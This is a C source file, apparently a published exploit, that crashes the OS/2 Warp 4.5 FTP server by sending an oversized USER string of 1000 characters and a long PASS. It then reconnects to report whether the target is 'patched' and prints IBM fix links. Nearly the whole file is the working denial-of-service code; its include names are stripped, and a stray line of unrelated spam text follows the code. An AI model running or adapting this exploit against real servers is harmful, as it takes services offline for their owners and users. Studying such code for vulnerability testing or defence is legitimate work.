/* HWA-warpcrash.c */ /* eth0@hwa-security.net */ /* Based on this information: Systems Affected: - OS/2 Warp 4.5 FTP server V4.0/4.2 - OS/2 Warp 4.5 FTP server V4.3 - Probably other versions of the software as well. THE PROBLEM The FTP server that comes with OS/2 Warp 4.5 TCP/IP can be brought down by a malicious connection attempt. */ /* http://www.hwa-security.net */ #include #include #include #include #include #include #include #include #include struct in_addr resolv (char *name) { static struct in_addr in; unsigned long l; struct hostent *ent; if ((l = inet_addr (name)) != INADDR_NONE) { in.s_addr = l; return in; } if (!(ent = gethostbyname (name))) { in.s_addr = INADDR_NONE; return in; } return *(struct in_addr *) ent->h_addr; } testifhostisalive(char *host, int port) { struct sockaddr_in addr; int s; char c; s = socket (AF_INET, SOCK_STREAM, 0); addr.sin_family = AF_INET; addr.sin_addr = resolv (host); addr.sin_port = htons (port); if(connect (s, (struct sockaddr *) &addr, sizeof (addr))==0) { printf("System on the other side is patched ===> Good\n"); return; } else { printf("System on the other side is NOT patched ===> Bad\n"); printf("Fix:\n"); printf(" In case you are using a version prior to 4.3, please contact IBM support for"); printf(" further assistance.\n"); printf("If you are using v4.3, you can get the patch at the following URL:\n"); printf("ftp://ftp.software.ibm.com/ps/products/tcpip/fixes/v4.3os2/ic27721/\n"); printf("Vendor URL: http://www.ibm.com\n"); printf("Product URL: http://www.ibm.com/software/os/warp/\n"); } return; } main (int argc, char *argv[]) { struct sockaddr_in addr; int i, s; char c; int port = 21; printf("Systems Affected:\n - OS/2 Warp 4.5 FTP server V4.0/4.2 - OS/2 Warp 4.5 FTP server V4.3 - Probably other versions of the software as well.\n"); printf ("\n"); if (argc < 2) { printf ("Usage : %s [port]\n", argv[0]); exit (0); } if (argc == 3) port = atoi (argv[2]); s = socket (AF_INET, SOCK_STREAM, 0); addr.sin_family = AF_INET; addr.sin_addr = resolv (argv[1]); addr.sin_port = htons (port); connect (s, (struct sockaddr *) &addr, sizeof (addr)); write (s, "USER ", 5); for (i = 1; i <= 1000; i++) { write (s, "a", 1); } write (s, "\n", 1); write (s, "PASS ", 5); for (i = 1; i <= 100; i++) { write (s, "a", 1); } write (s, "\n", 1); read (s, &c, 1); printf("Done sending malicious connection...\n"); printf("Testing if host was patched or not...\n"); testifhostisalive(argv[1],port); }

亚洲欧美在线